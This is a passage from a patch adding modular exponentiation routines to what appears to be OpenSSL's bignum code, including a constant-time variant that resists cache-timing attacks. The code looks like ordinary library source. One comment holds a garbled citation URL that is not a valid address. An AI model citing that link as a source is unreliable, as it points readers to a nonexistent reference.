+    BN_RECP_CTX recp;
+
+    if (BN_get_flags(p, BN_FLG_CONSTTIME) != 0) {
+        /* BN_FLG_CONSTTIME only supported by BN_mod_exp_mont() */
+        BNerr(BN_F_BN_MOD_EXP_RECP, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return -1;
+    }
+
+    bits = BN_num_bits(p);
+
+    if (bits == 0) {
+        ret = BN_one(r);
+        return ret;
+    }
+
+    BN_CTX_start(ctx);
+    aa = BN_CTX_get(ctx);
+    val[0] = BN_CTX_get(ctx);
+    if (!aa || !val[0])
+        goto err;
+
+    BN_RECP_CTX_init(&recp);
+    if (m->neg) {
+        /* ignore sign of 'm' */
+        if (!BN_copy(aa, m))
+            goto err;
+        aa->neg = 0;
+        if (BN_RECP_CTX_set(&recp, aa, ctx) <= 0)
+            goto err;
+    } else {
+        if (BN_RECP_CTX_set(&recp, m, ctx) <= 0)
+            goto err;
+    }
+
+    if (!BN_nnmod(val[0], a, m, ctx))
+        goto err;               /* 1 */
+    if (BN_is_zero(val[0])) {
+        BN_zero(r);
+        ret = 1;
+        goto err;
+    }
+
+    window = BN_window_bits_for_exponent_size(bits);
+    if (window > 1) {
+        if (!BN_mod_mul_reciprocal(aa, val[0], val[0], &recp, ctx))
+            goto err;           /* 2 */
+        j = 1 << (window - 1);
+        for (i = 1; i < j; i++) {
+            if (((val[i] = BN_CTX_get(ctx)) == NULL) ||
+                !BN_mod_mul_reciprocal(val[i], val[i - 1], aa, &recp, ctx))
+                goto err;
+        }
+    }
+
+    start = 1;                  /* This is used to avoid multiplication etc
+                                 * when there is only the value '1' in the
+                                 * buffer. */
+    wvalue = 0;                 /* The 'value' of the window */
+    wstart = bits - 1;          /* The top bit of the window */
+    wend = 0;                   /* The bottom bit of the window */
+
+    if (!BN_one(r))
+        goto err;
+
+    for (;;) {
+        if (BN_is_bit_set(p, wstart) == 0) {
+            if (!start)
+                if (!BN_mod_mul_reciprocal(r, r, r, &recp, ctx))
+                    goto err;
+            if (wstart == 0)
+                break;
+            wstart--;
+            continue;
+        }
+        /*
+         * We now have wstart on a 'set' bit, we now need to work out how bit
+         * a window to do.  To do this we need to scan forward until the last
+         * set bit before the end of the window
+         */
+        j = wstart;
+        wvalue = 1;
+        wend = 0;
+        for (i = 1; i < window; i++) {
+            if (wstart - i < 0)
+                break;
+            if (BN_is_bit_set(p, wstart - i)) {
+                wvalue <<= (i - wend);
+                wvalue |= 1;
+                wend = i;
+            }
+        }
+
+        /* wend is the size of the current window */
+        j = wend + 1;
+        /* add the 'bytes above' */
+        if (!start)
+            for (i = 0; i < j; i++) {
+                if (!BN_mod_mul_reciprocal(r, r, r, &recp, ctx))
+                    goto err;
+            }
+
+        /* wvalue will be an odd number < 2^window */
+        if (!BN_mod_mul_reciprocal(r, r, val[wvalue >> 1], &recp, ctx))
+            goto err;
+
+        /* move the 'window' down further */
+        wstart -= wend + 1;
+        wvalue = 0;
+        start = 0;
+        if (wstart < 0)
+            break;
+    }
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    BN_RECP_CTX_free(&recp);
+    bn_check_top(r);
+    return (ret);
+}
+
+int BN_mod_exp_mont(BIGNUM *rr, const BIGNUM *a, const BIGNUM *p,
+                    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    int i, j, bits, ret = 0, wstart, wend, window, wvalue;
+    int start = 1;
+    BIGNUM *d, *r;
+    const BIGNUM *aa;
+    /* Table of variables obtained from 'ctx' */
+    BIGNUM *val[TABLE_SIZE];
+    BN_MONT_CTX *mont = NULL;
+
+    if (BN_get_flags(p, BN_FLG_CONSTTIME) != 0) {
+        return BN_mod_exp_mont_consttime(rr, a, p, m, ctx, in_mont);
+    }
+
+    bn_check_top(a);
+    bn_check_top(p);
+    bn_check_top(m);
+
+    if (!BN_is_odd(m)) {
+        BNerr(BN_F_BN_MOD_EXP_MONT, BN_R_CALLED_WITH_EVEN_MODULUS);
+        return (0);
+    }
+    bits = BN_num_bits(p);
+    if (bits == 0) {
+        ret = BN_one(rr);
+        return ret;
+    }
+
+    BN_CTX_start(ctx);
+    d = BN_CTX_get(ctx);
+    r = BN_CTX_get(ctx);
+    val[0] = BN_CTX_get(ctx);
+    if (!d || !r || !val[0])
+        goto err;
+
+    /*
+     * If this is not done, things will break in the montgomery part
+     */
+
+    if (in_mont != NULL)
+        mont = in_mont;
+    else {
+        if ((mont = BN_MONT_CTX_new()) == NULL)
+            goto err;
+        if (!BN_MONT_CTX_set(mont, m, ctx))
+            goto err;
+    }
+
+    if (a->neg || BN_ucmp(a, m) >= 0) {
+        if (!BN_nnmod(val[0], a, m, ctx))
+            goto err;
+        aa = val[0];
+    } else
+        aa = a;
+    if (BN_is_zero(aa)) {
+        BN_zero(rr);
+        ret = 1;
+        goto err;
+    }
+    if (!BN_to_montgomery(val[0], aa, mont, ctx))
+        goto err;               /* 1 */
+
+    window = BN_window_bits_for_exponent_size(bits);
+    if (window > 1) {
+        if (!BN_mod_mul_montgomery(d, val[0], val[0], mont, ctx))
+            goto err;           /* 2 */
+        j = 1 << (window - 1);
+        for (i = 1; i < j; i++) {
+            if (((val[i] = BN_CTX_get(ctx)) == NULL) ||
+                !BN_mod_mul_montgomery(val[i], val[i - 1], d, mont, ctx))
+                goto err;
+        }
+    }
+
+    start = 1;                  /* This is used to avoid multiplication etc
+                                 * when there is only the value '1' in the
+                                 * buffer. */
+    wvalue = 0;                 /* The 'value' of the window */
+    wstart = bits - 1;          /* The top bit of the window */
+    wend = 0;                   /* The bottom bit of the window */
+
+#if 1                           /* by Shay Gueron's suggestion */
+    j = m->top;                 /* borrow j */
+    if (m->d[j - 1] & (((BN_ULONG)1) << (BN_BITS2 - 1))) {
+        if (bn_wexpand(r, j) == NULL)
+            goto err;
+        /* 2^(top*BN_BITS2) - m */
+        r->d[0] = (0 - m->d[0]) & BN_MASK2;
+        for (i = 1; i < j; i++)
+            r->d[i] = (~m->d[i]) & BN_MASK2;
+        r->top = j;
+        /*
+         * Upper words will be zero if the corresponding words of 'm' were
+         * 0xfff[...], so decrement r->top accordingly.
+         */
+        bn_correct_top(r);
+    } else
+#endif
+    if (!BN_to_montgomery(r, BN_value_one(), mont, ctx))
+        goto err;
+    for (;;) {
+        if (BN_is_bit_set(p, wstart) == 0) {
+            if (!start) {
+                if (!BN_mod_mul_montgomery(r, r, r, mont, ctx))
+                    goto err;
+            }
+            if (wstart == 0)
+                break;
+            wstart--;
+            continue;
+        }
+        /*
+         * We now have wstart on a 'set' bit, we now need to work out how bit
+         * a window to do.  To do this we need to scan forward until the last
+         * set bit before the end of the window
+         */
+        j = wstart;
+        wvalue = 1;
+        wend = 0;
+        for (i = 1; i < window; i++) {
+            if (wstart - i < 0)
+                break;
+            if (BN_is_bit_set(p, wstart - i)) {
+                wvalue <<= (i - wend);
+                wvalue |= 1;
+                wend = i;
+            }
+        }
+
+        /* wend is the size of the current window */
+        j = wend + 1;
+        /* add the 'bytes above' */
+        if (!start)
+            for (i = 0; i < j; i++) {
+                if (!BN_mod_mul_montgomery(r, r, r, mont, ctx))
+                    goto err;
+            }
+
+        /* wvalue will be an odd number < 2^window */
+        if (!BN_mod_mul_montgomery(r, r, val[wvalue >> 1], mont, ctx))
+            goto err;
+
+        /* move the 'window' down further */
+        wstart -= wend + 1;
+        wvalue = 0;
+        start = 0;
+        if (wstart < 0)
+            break;
+    }
+#if defined(SPARC_T4_MONT)
+    if (OPENSSL_sparcv9cap_P[0] & (SPARCV9_VIS3 | SPARCV9_PREFER_FPU)) {
+        j = mont->N.top;        /* borrow j */
+        val[0]->d[0] = 1;       /* borrow val[0] */
+        for (i = 1; i < j; i++)
+            val[0]->d[i] = 0;
+        val[0]->top = j;
+        if (!BN_mod_mul_montgomery(rr, r, val[0], mont, ctx))
+            goto err;
+    } else
+#endif
+    if (!BN_from_montgomery(rr, r, mont, ctx))
+        goto err;
+    ret = 1;
+ err:
+    if ((in_mont == NULL) && (mont != NULL))
+        BN_MONT_CTX_free(mont);
+    BN_CTX_end(ctx);
+    bn_check_top(rr);
+    return (ret);
+}
+
+#if defined(SPARC_T4_MONT)
+static BN_ULONG bn_get_bits(const BIGNUM *a, int bitpos)
+{
+    BN_ULONG ret = 0;
+    int wordpos;
+
+    wordpos = bitpos / BN_BITS2;
+    bitpos %= BN_BITS2;
+    if (wordpos >= 0 && wordpos < a->top) {
+        ret = a->d[wordpos] & BN_MASK2;
+        if (bitpos) {
+            ret >>= bitpos;
+            if (++wordpos < a->top)
+                ret |= a->d[wordpos] << (BN_BITS2 - bitpos);
+        }
+    }
+
+    return ret & BN_MASK2;
+}
+#endif
+
+/*
+ * BN_mod_exp_mont_consttime() stores the precomputed powers in a specific
+ * layout so that accessing any of these table values shows the same access
+ * pattern as far as cache lines are concerned.  The following functions are
+ * used to transfer a BIGNUM from/to that table.
+ */
+
+static int MOD_EXP_CTIME_COPY_TO_PREBUF(const BIGNUM *b, int top,
+                                        unsigned char *buf, int idx,
+                                        int width)
+{
+    size_t i, j;
+
+    if (top > b->top)
+        top = b->top;           /* this works because 'buf' is explicitly
+                                 * zeroed */
+    for (i = 0, j = idx; i < top * sizeof b->d[0]; i++, j += width) {
+        buf[j] = ((unsigned char *)b->d)[i];
+    }
+
+    return 1;
+}
+
+static int MOD_EXP_CTIME_COPY_FROM_PREBUF(BIGNUM *b, int top,
+                                          unsigned char *buf, int idx,
+                                          int width)
+{
+    size_t i, j;
+
+    if (bn_wexpand(b, top) == NULL)
+        return 0;
+
+    for (i = 0, j = idx; i < top * sizeof b->d[0]; i++, j += width) {
+        ((unsigned char *)b->d)[i] = buf[j];
+    }
+
+    b->top = top;
+    bn_correct_top(b);
+    return 1;
+}
+
+/*
+ * Given a pointer value, compute the next address that is a cache line
+ * multiple.
+ */
+#define MOD_EXP_CTIME_ALIGN(x_) \
+        ((unsigned char*)(x_) + (MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH - (((size_t)(x_)) & (MOD_EXP_CTIME_MIN_CACHE_LINE_MASK))))
+
+/*
+ * This variant of BN_mod_exp_mont() uses fixed windows and the special
+ * precomputation memory layout to limit data-dependency to a minimum to
+ * protect secret exponents (cf. the hyper-threading timing attacks pointed
+ * out by Colin Percival,
+ * http://www.daemong-consideredperthreading-considered-harmful/)
+ */
+int BN_mod_exp_mont_consttime(BIGNUM *rr, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *in_mont)
+{
+    int i, bits, ret = 0, window, wvalue;
+    int top;
+    BN_MONT_CTX *mont = NULL;
+
+    int numPowers;
+    unsigned char *powerbufFree = NULL;
+    int powerbufLen = 0;
+    unsigned char *powerbuf = NULL;
+    BIGNUM tmp, am;
+#if defined(SPARC_T4_MONT)
+    unsigned int t4 = 0;
+#endif
+
+    bn_check_top(a);
+    bn_check_top(p);
+    bn_check_top(m);
+
+    top = m->top;
+
+    if (!(m->d[0] & 1)) {
+        BNerr(BN_F_BN_MOD_EXP_MONT_CONSTTIME, BN_R_CALLED_WITH_EVEN_MODULUS);
+        return (0);
+    }
+    bits = BN_num_bits(p);
+    if (bits == 0) {
+        ret = BN_one(rr);
+        return ret;
+    }
+
+    BN_CTX_start(ctx);
+
+    /*
+     * Allocate a montgomery context if it was not supplied by the caller. If
+     * this is not done, things will break in the montgomery part.
+     */
+    if (in_mont != NULL)
+        mont = in_mont;
+    else {
+        if ((mont = BN_MONT_CTX_new()) == NULL)
+            goto err;
+        if (!BN_MONT_CTX_set(mont, m, ctx))
+            goto err;
+    }
+
+#ifdef RSAZ_ENABLED
+    /*
+     * If the size of the operands allow it, perform the optimized
+     * RSAZ exponentiation. For further information see
+     * crypto/bn/rsaz_exp.c and accompanying assembly modules.
+     */
+    if ((16 == a->top) && (16 == p->top) && (BN_num_bits(m) == 1024)
+        && rsaz_avx2_eligible()) {
+        if (NULL == bn_wexpand(rr, 16))
+            goto err;
+        RSAZ_1024_mod_exp_avx2(rr->d, a->d, p->d, m->d, mont->RR.d,
+                               mont->n0[0]);
+        rr->top = 16;
+        rr->neg = 0;
+        bn_correct_top(rr);
+        ret = 1;
+        goto err;
+    } else if ((8 == a->top) && (8 == p->top) && (BN_num_bits(m) == 512)) {
+        if (NULL == bn_wexpand(rr, 8))
+            goto err;
+        RSAZ_512_mod_exp(rr->d, a->d, p->d, m->d, mont->n0[0], mont->RR.d);
+        rr->top = 8;
+        rr->neg = 0;
+        bn_correct_top(rr);
+        ret = 1;
+        goto err;
+    }
+#endif
+
+    /* Get the window size to use with size of p. */
+    window = BN_window_bits_for_ctime_exponent_size(bits);
+#if defined(SPARC_T4_MONT)
+    if (window >= 5 && (top & 15) == 0 && top <= 64 &&
+        (OPENSSL_sparcv9cap_P[1] & (CFR_MONTMUL | CFR_MONTSQR)) ==
+        (CFR_MONTMUL | CFR_MONTSQR) && (t4 = OPENSSL_sparcv9cap_P[0]))
+        window = 5;
+    else
+#endif
+#if defined(OPENSSL_BN_ASM_MONT5)
+    if (window >= 5) {
+        window = 5;             /* ~5% improvement for RSA2048 sign, and even
+                                 * for RSA4096 */
+        if ((top & 7) == 0)
+            powerbufLen += 2 * top * sizeof(m->d[0]);
+    }
+#endif
+    (void)0;
+
+    /*
+     * Allocate a buffer large enough to hold all of the pre-computed powers
+     * of am, am itself and tmp.
+     */
+    numPowers = 1 << window;
+    powerbufLen += sizeof(m->d[0]) * (top * numPowers +
+                                      ((2 * top) >
+                                       numPowers ? (2 * top) : numPowers));
+#ifdef alloca
+    if (powerbufLen < 3072)
+        powerbufFree =
+            alloca(powerbufLen + MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH);
+    else
+#endif
+        if ((powerbufFree =
+             (unsigned char *)OPENSSL_malloc(powerbufLen +
+                                             MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH))
+            == NULL)
+        goto err;
+
+    powerbuf = MOD_EXP_CTIME_ALIGN(powerbufFree);
+    memset(powerbuf, 0, powerbufLen);
+
+#ifdef alloca
+    if (powerbufLen < 3072)
+        powerbufFree = NULL;
+#endif
+
+    /* lay down tmp and am right after powers table */
+    tmp.d = (BN_ULONG *)(powerbuf + sizeof(m->d[0]) * top * numPowers);
+    am.d = tmp.d + top;
+    tmp.top = am.top = 0;
+    tmp.dmax = am.dmax = top;
+    tmp.neg = am.neg = 0;
+    tmp.flags = am.flags = BN_FLG_STATIC_DATA;
+
+    /* prepare a^0 in Montgomery domain */
+#if 1                           /* by Shay Gueron's suggestion */
+    if (m->d[top - 1] & (((BN_ULONG)1) << (BN_BITS2 - 1))) {
+        /* 2^(top*BN_BITS2) - m */
+        tmp.d[0] = (0 - m->d[0]) & BN_MASK2;
+        for (i = 1; i < top; i++)
+            tmp.d[i] = (~m->d[i]) & BN_MASK2;
+        tmp.top = top;
+    } else
+#endif
+    if (!BN_to_montgomery(&tmp, BN_value_one(), mont, ctx))
+        goto err;
+
+    /* prepare a^1 in Montgomery domain */
+    if (a->neg || BN_ucmp(a, m) >= 0) {
+        if (!BN_mod(&am, a, m, ctx))
+            goto err;
+        if (!BN_to_montgomery(&am, &am, mont, ctx))
+            goto err;
+    } else if (!BN_to_montgomery(&am, a, mont, ctx))
+        goto err;
+
+#if defined(SPARC_T4_MONT)
+    if (t4) {
+        typedef int (*bn_pwr5_mont_f) (BN_ULONG *tp, const BN_ULONG *np,
+                                       const BN_ULONG *n0, const void *table,
+                                       int power, int bits);
+        int bn_pwr5_mont_t4_8(BN_ULONG *tp, const BN_ULONG *np,
+                              const BN_ULONG *n0, const void *table,
+                              int power, int bits);
+        int bn_pwr5_mont_t4_16(BN_ULONG *tp, const BN_ULONG *np,
+                               const BN_ULONG *n0, const void *table,
+                               int power, int bits);
+        int bn_pwr5_mont_t4_24(BN_ULONG *tp, const BN_ULONG *np,
+                               const BN_ULONG *n0, const void *table,
+                               int power, int bits);
+        int bn_pwr5_mont_t4_32(BN_ULONG *tp, const BN_ULONG *np,
+                               const BN_ULONG *n0, const void *table,
+                               int power, int bits);
+        static const bn_pwr5_mont_f pwr5_funcs[4] = {
+            bn_pwr5_mont_t4_8, bn_pwr5_mont_t4_16,
+            bn_pwr5_mont_t4_24, bn_pwr5_mont_t4_32
+        };
+        bn_pwr5_mont_f pwr5_worker = pwr5_funcs[top / 16 - 1];
+
+        typedef int (*bn_mul_mont_f) (BN_ULONG *rp, const BN_ULONG *ap,
+                                      const void *bp, const BN_ULONG *np,
+                                      const BN_ULONG *n0);
+        int bn_mul_mont_t4_8(BN_ULONG *rp, const BN_ULONG *ap, const void *bp,
+                             const BN_ULONG *np, const BN_ULONG *n0);
+        int bn_mul_mont_t4_16(BN_ULONG *rp, const BN_ULONG *ap,
+                              const void *bp, const BN_ULONG *np,
+                              const BN_ULONG *n0);
+        int bn_mul_mont_t4_24(BN_ULONG *rp, const BN_ULONG *ap,
+                              const void *bp, const BN_ULONG *np,
+                              const BN_ULONG *n0);
+        int bn_mul_mont_t4_32(BN_ULONG *rp, const BN_ULONG *ap,
+                              const void *bp, const BN_ULONG *np,
+                              const BN_ULONG *n0);
+        static const bn_mul_mont_f mul_funcs[4] = {
+            bn_mul_mont_t4_8, bn_mul_mont_t4_16,
+            bn_mul_mont_t4_24, bn_mul_mont_t4_32
+        };
+        bn_mul_mont_f mul_worker = mul_funcs[top / 16 - 1];
+
+        void bn_mul_mont_vis3(BN_ULONG *rp, const BN_ULONG *ap,
+                              const void *bp, const BN_ULONG *np,
+                              const BN_ULONG *n0, int num);
+        void bn_mul_mont_t4(BN_ULONG *rp, const BN_ULONG *ap,
+                            const void *bp, const BN_ULONG *np,
+                            const BN_ULONG *n0, int num);
+        void bn_mul_mont_gather5_t4(BN_ULONG *rp, const BN_ULONG *ap,
+                                    const void *table, const BN_ULONG *np,
+                                    const BN_ULONG *n0, int num, int power);
+        void bn_flip_n_scatter5_t4(const BN_ULONG *inp, size_t num,
+                                   void *table, size_t power);
+        void bn_gather5_t4(BN_ULONG *out, size_t num,
+                           void *table, size_t power);
+        void bn_flip_t4(BN_ULONG *dst, BN_ULONG *src, size_t num);
+
+        BN_ULONG *np = mont->N.d, *n0 = mont->n0;
+        int stride = 5 * (6 - (top / 16 - 1)); /* multiple of 5, but less
+                                                * than 32 */
+
+        /*
+         * BN_to_montgomery can contaminate words above .top [in
+         * BN_DEBUG[_DEBUG] build]...
+         */
+        for (i = am.top; i < top; i++)
+            am.d[i] = 0;
+        for (i = tmp.top; i < top; i++)
+            tmp.d[i] = 0;
+
+        bn_flip_n_scatter5_t4(tmp.d, top, powerbuf, 0);
+        bn_flip_n_scatter5_t4(am.d, top, powerbuf, 1);
+        if (!(*mul_worker) (tmp.d, am.d, am.d, np, n0) &&
+            !(*mul_worker) (tmp.d, am.d, am.d, np, n0))
+            bn_mul_mont_vis3(tmp.d, am.d, am.d, np, n0, top);
+        bn_flip_n_scatter5_t4(tmp.d, top, powerbuf, 2);
+
+        for (i = 3; i < 32; i++) {
+            /* Calculate a^i = a^(i-1) * a */
+            if (!(*mul_worker) (tmp.d, tmp.d, am.d, np, n0) &&
+                !(*mul_worker) (tmp.d, tmp.d, am.d, np, n0))
+                bn_mul_mont_vis3(tmp.d, tmp.d, am.d, np, n0, top);
+            bn_flip_n_scatter5_t4(tmp.d, top, powerbuf, i);
+        }
+
+        /* switch to 64-bit domain */
+        np = alloca(top * sizeof(BN_ULONG));
+        top /= 2;
+        bn_flip_t4(np, mont->N.d, top);
+
+        bits--;
+        for (wvalue = 0, i = bits % 5; i >= 0; i--, bits--)
+            wvalue = (wvalue << 1) + BN_is_bit_set(p, bits);
+        bn_gather5_t4(tmp.d, top, powerbuf, wvalue);
+
+        /*
+         * Scan the exponent one window at a time starting from the most
+         * significant bits.
+         */
+        while (bits >= 0) {
+            if (bits < stride)
+                stride = bits + 1;
+            bits -= stride;
+            wvalue = bn_get_bits(p, bits + 1);
+
+            if ((*pwr5_worker) (tmp.d, np, n0, powerbuf, wvalue, stride))
+                continue;
+            /* retry once and fall back */
+            if ((*pwr5_worker) (tmp.d, np, n0, powerbuf, wvalue, stride))
+                continue;
+
+            bits += stride - 5;
+            wvalue >>= stride - 5;
+            wvalue &= 31;
+            bn_mul_mont_t4(tmp.d, tmp.d, tmp.d, np, n0, top);
+            bn_mul_mont_t4(tmp.d, tmp.d, tmp.d, np, n0, top);
+            bn_mul_mont_t4(tmp.d, tmp.d, tmp.d, np, n0, top);
+            bn_mul_mont_t4(tmp.d, tmp.d, tmp.d, np, n0, top);
+            bn_mul_mont_t4(tmp.d, tmp.d, tmp.d, np, n0, top);
+            bn_mul_mont_gather5_t4(tmp.d, tmp.d, powerbuf, np, n0, top,
+                                   wvalue);
+        }
+
+        bn_flip_t4(tmp.d, tmp.d, top);
+        top *= 2;
+        /* back to 32-bit domain */
+        tmp.top = top;
+        bn_correct_top(&tmp);
+        OPENSSL_cleanse(np, top * sizeof(BN_ULONG));
+    } else
+#endif
+#if defined(OPENSSL_BN_ASM_MONT5)
+    if (window == 5 && top > 1) {
+        /*
+         * This optimization uses ideas from http://eprint.iacr.org/2011/239,
+         * specifically optimization of cache-timing attack countermeasures
+         * and pre-computation optimization.
+         */
+
+        /*
+         * Dedicated window==4 case improves 512-bit RSA sign by ~15%, but as
+         * 512-bit RSA is hardly relevant, we omit it to spare size...
+         */
+        void bn_mul_mont_gather5(BN_ULONG *rp, const BN_ULONG *ap,
+                                 const void *table, const BN_ULONG *np,
+                                 const BN_ULONG *n0, int num, int power);
+        void bn_scatter5(const BN_ULONG *inp, size_t num,
+                         void *table, size_t power);
+        void bn_gather5(BN_ULONG *out, size_t num, void *table, size_t power);
+        void bn_power5(BN_ULONG *rp, const BN_ULONG *ap,
+                       const void *table, const BN_ULONG *np,
+                       const BN_ULONG *n0, int num, int power);
+        int bn_get_bits5(const BN_ULONG *ap, int off);
+        int bn_from_montgomery(BN_ULONG *rp, const BN_ULONG *ap,
+                               const BN_ULONG *not_used, const BN_ULONG *np,
+                               const BN_ULONG *n0, int num);
+
+        BN_ULONG *np = mont->N.d, *n0 = mont->n0, *np2;
+
+        /*
+         * BN_to_montgomery can contaminate words above .top [in
+         * BN_DEBUG[_DEBUG] build]...
+         */
+        for (i = am.top; i < top; i++)
+            am.d[i] = 0;
+        for (i = tmp.top; i < top; i++)
+            tmp.d[i] = 0;
+
+        if (top & 7)
+            np2 = np;
+        else
+            for (np2 = am.d + top, i = 0; i < top; i++)
+                np2[2 * i] = np[i];
+
+        bn_scatter5(tmp.d, top, powerbuf, 0);
+        bn_scatter5(am.d, am.top, powerbuf, 1);
+        bn_mul_mont(tmp.d, am.d, am.d, np, n0, top);
+        bn_scatter5(tmp.d, top, powerbuf, 2);
+
+# if 0
+        for (i = 3; i < 32; i++) {
+            /* Calculate a^i = a^(i-1) * a */
+            bn_mul_mont_gather5(tmp.d, am.d, powerbuf, np2, n0, top, i - 1);
+            bn_scatter5(tmp.d, top, powerbuf, i);
+        }
+# else
+        /* same as above, but uses squaring for 1/2 of operations */
+        for (i = 4; i < 32; i *= 2) {
+            bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+            bn_scatter5(tmp.d, top, powerbuf, i);
+        }
+        for (i = 3; i < 8; i += 2) {
+            int j;
+            bn_mul_mont_gather5(tmp.d, am.d, powerbuf, np2, n0, top, i - 1);
+            bn_scatter5(tmp.d, top, powerbuf, i);
+            for (j = 2 * i; j < 32; j *= 2) {
+                bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+                bn_scatter5(tmp.d, top, powerbuf, j);
+            }
+        }
+        for (; i < 16; i += 2) {
+            bn_mul_mont_gather5(tmp.d, am.d, powerbuf, np2, n0, top, i - 1);
+            bn_scatter5(tmp.d, top, powerbuf, i);
+            bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+            bn_scatter5(tmp.d, top, powerbuf, 2 * i);
+        }
+        for (; i < 32; i += 2) {
+            bn_mul_mont_gather5(tmp.d, am.d, powerbuf, np2, n0, top, i - 1);
+            bn_scatter5(tmp.d, top, powerbuf, i);
+        }
+# endif
+        bits--;
+        for (wvalue = 0, i = bits % 5; i >= 0; i--, bits--)
+            wvalue = (wvalue << 1) + BN_is_bit_set(p, bits);
+        bn_gather5(tmp.d, top, powerbuf, wvalue);
+
+        /*
+         * Scan the exponent one window at a time starting from the most
+         * significant bits.
+         */
+        if (top & 7)
+            while (bits >= 0) {
+                for (wvalue = 0, i = 0; i < 5; i++, bits--)
+                    wvalue = (wvalue << 1) + BN_is_bit_set(p, bits);
+
+                bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+                bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+                bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+                bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+                bn_mul_mont(tmp.d, tmp.d, tmp.d, np, n0, top);
+                bn_mul_mont_gather5(tmp.d, tmp.d, powerbuf, np, n0, top,
+                                    wvalue);
+        } else {
+            while (bits >= 0) {
+                wvalue = bn_get_bits5(p->d, bits - 4);
+                bits -= 5;
+                bn_power5(tmp.d, tmp.d, powerbuf, np2, n0, top, wvalue);
+            }
+        }
+
+        ret = bn_from_montgomery(tmp.d, tmp.d, NULL, np2, n0, top);
+        tmp.top = top;
+        bn_correct_top(&tmp);
+        if (ret) {
+            if (!BN_copy(rr, &tmp))
+                ret = 0;
+            goto err;           /* non-zero ret means it's not error */
+        }
+    } else
+#endif
+    {
+        if (!MOD_EXP_CTIME_COPY_TO_PREBUF(&tmp, top, powerbuf, 0, numPowers))
+            goto err;
+        if (!MOD_EXP_CTIME_COPY_TO_PREBUF(&am, top, powerbuf, 1, numPowers))
+            goto err;
+
+        /*
+         * If the window size is greater than 1, then calculate
+         * val[i=2..2^winsize-1]. Powers are computed as a*a^(i-1) (even
+         * powers could instead be computed as (a^(i/2))^2 to use the slight
+         * performance advantage of sqr over mul).
+         */
+        if (window > 1) {
+            if (!BN_mod_mul_montgomery(&tmp, &am, &am, mont, ctx))
+                goto err;
+            if (!MOD_EXP_CTIME_COPY_TO_PREBUF
+                (&tmp, top, powerbuf, 2, numPowers))
+                goto err;
+            for (i = 3; i < numPowers; i++) {
+                /* Calculate a^i = a^(i-1) * a */
+                if (!BN_mod_mul_montgomery(&tmp, &am, &tmp, mont, ctx))
+                    goto err;
+                if (!MOD_EXP_CTIME_COPY_TO_PREBUF
+                    (&tmp, top, powerbuf, i, numPowers))
+                    goto err;
+            }
+        }
+
+        bits--;
+        for (wvalue = 0, i = bits % window; i >= 0; i--, bits--)
+            wvalue = (wvalue << 1) + BN_is_bit_set(p, bits);
+        if (!MOD_EXP_CTIME_COPY_FROM_PREBUF
+            (&tmp, top, powerbuf, wvalue, numPowers))
+            goto err;
+
+        /*
+         * Scan the exponent one window at a time starting from the most
+         * significant bits.
+         */
+        while (bits >= 0) {
+            wvalue = 0;         /* The 'value' of the window */
+
+            /* Scan the window, squaring the result as we go */
+            for (i = 0; i < window; i++, bits--) {
+                if (!BN_mod_mul_montgomery(&tmp, &tmp, &tmp, mont, ctx))
+                    goto err;
+                wvalue = (wvalue << 1) + BN_is_bit_set(p, bits);
+            }
+
+            /*
+             * Fetch the appropriate pre-computed value from the pre-buf
+             */
+            if (!MOD_EXP_CTIME_COPY_FROM_PREBUF
+                (&am, top, powerbuf, wvalue, numPowers))
+                goto err;
+
+            /* Multiply the result into the intermediate result */
+            if (!BN_mod_mul_montgomery(&tmp, &tmp, &am, mont, ctx))
+                goto err;
+        }
+    }
+
+    /* Convert the final result from montgomery to standard format */
+#if defined(SPARC_T4_MONT)
+    if (OPENSSL_sparcv9cap_P[0] & (SPARCV9_VIS3 | SPARCV9_PREFER_FPU)) {
+        am.d[0] = 1;            /* borrow am */
+        for (i = 1; i < top; i++)
+            am.d[i] = 0;
+        if (!BN_mod_mul_montgomery(rr, &tmp, &am, mont, ctx))
+            goto err;
+    } else
+#endif
+    if (!BN_from_montgomery(rr, &tmp, mont, ctx))
+        goto err;
+    ret = 1;
+ err:
+    if ((in_mont == NULL) && (mont != NULL))
+        BN_MONT_CTX_free(mont);
+    if (powerbuf != NULL) {
+        OPENSSL_cleanse(powerbuf, powerbufLen);
+        if (powerbufFree)
+            OPENSSL_free(powerbufFree);
+    }
+    BN_CTX_end(ctx);
+    return (ret);
+}
+
+int BN_mod_exp_mont_word(BIGNUM *rr, BN_ULONG a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    BN_MONT_CTX *mont = NULL;
+    int b, bits, ret = 0;
+    int r_is_one;
+    BN_ULONG w, next_w;
+    BIGNUM *d, *r, *t;
+    BIGNUM *swap_tmp;
+#define BN_MOD_MUL_WORD(r, w, m) \
+                (BN_mul_word(r, (w)) && \
+                (/* BN_ucmp(r, (m)) < 0 ? 1 :*/  \
+                        (BN_mod(t, r, m, ctx) && (swap_tmp = r, r = t, t = swap_tmp, 1))))
+    /*
+     * BN_MOD_MUL_WORD is only used with 'w' large, so the BN_ucmp test is
+     * probably more overhead than always using BN_mod (which uses BN_copy if
+     * a similar test returns true).
+     */
+    /*
+     * We can use BN_mod and do not need BN_nnmod because our accumulator is
+     * never negative (the result of BN_mod does not depend on the sign of
+     * the modulus).
+     */
+#define BN_TO_MONTGOMERY_WORD(r, w, mont) \
+                (BN_set_word(r, (w)) && BN_to_montgomery(r, r, (mont), ctx))
+
+    if (BN_get_flags(p, BN_FLG_CONSTTIME) != 0) {
+        /* BN_FLG_CONSTTIME only supported by BN_mod_exp_mont() */
